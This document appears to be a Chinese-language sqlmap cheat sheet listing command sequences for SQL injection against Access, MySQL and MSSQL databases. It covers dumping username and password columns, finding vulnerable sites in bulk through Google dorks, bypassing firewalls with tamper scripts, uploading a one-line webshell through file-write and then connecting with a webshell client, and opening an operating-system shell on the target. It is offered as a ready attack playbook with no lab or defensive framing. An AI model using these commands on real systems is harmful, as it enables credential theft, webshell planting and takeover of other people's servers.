所有命令 只要是完整的单词 前面都是两个横杠(--tables --columns),如果是一个单词或者缩写前面都是一个横杠(-D -T -dbs)
1.access数据库注入
-u "指定一个url"
sqlmap -u "url" 直接回车判定是否是注入点
sqlmap -u "url" --tables 回车 根据access特点猜表名 他会去字典里面搜索表名
sqlmap -u "url" --columns -T 表名 设置线程数(一般为10),然后根据字典猜解列名,找到敏感名字(username password等)的时候ctlr+c退出
sqlmap -u "url" --dump -C username,password -T 表名 就能猜出username和password的内容
2.mysql数据库注入
sqlmap -u "url"判断是否为注入点,查看服务器系统
sqlmap -u "url" --is-dba 当前用户是否为管理员权限
sqlmap -u "url" --dbs 列出所有数据库
sqlmap -u "url" --current-db 当前数据库
sqlmap -u "url" --current-user 当前用户 --users 所有用户
sqlmap -u "url" --tables -D 数据库名
sqlmap -u "url" --columns -T 表名 -D 数据库名
sqlmap -u "url" --dump -C 列名 -T 表名 -D 数据库名
3.mssql数据库注入
和mysql数据库类似
4.cookie中转注入
sqlmap -u "url" --cookie="cookie" level 2 等级1只能检测 get 和post
然后和常规注入相似
5.利用google批量搜索注入
-g 使用google 利用vpn翻墙
搜索引擎语法:inurl intext intitle site
sqlmap -g "inurl:php?eid=" 从谷歌搜索带有php?eid=的url
6.tamper插件使用
当可以注入但无回显的时候,就是有防火墙
sqlmap -u "url" --tamper "tamper文件中的脚本"
推荐与-v 3 --batch 一起使用
7.file参数的使用
必须要数据库管路员权限才能使用 (dba)
sqlmap -u "url" --is-dba判断是否为dba权限
file-write "写入的文件"从本地写入(一句话木马之类的)把反斜杠改为斜杠
file-dest “被写入的绝对路径” 该斜杠
sqlmap -u “url” --file-write "写入的文件" --file-dest “被写入的绝对路径”
然后就可以使用菜刀连接
8.post提交方式的注入
forms 自动获取post包&&截取数据
r 从本地获取结果
sqlmap -u "url" --forms 获取post数据
sqlmap -r post.txt post.txt为本地文件
如果成功就可以进行注入了
9.os参数
cmd执行cmd命令
shell执行当前用户命令
sqlmap -u “url” --os-cmd-ipconfig 执行ipconfig命令
sqlmap -u “url” --os-shell 进入到shell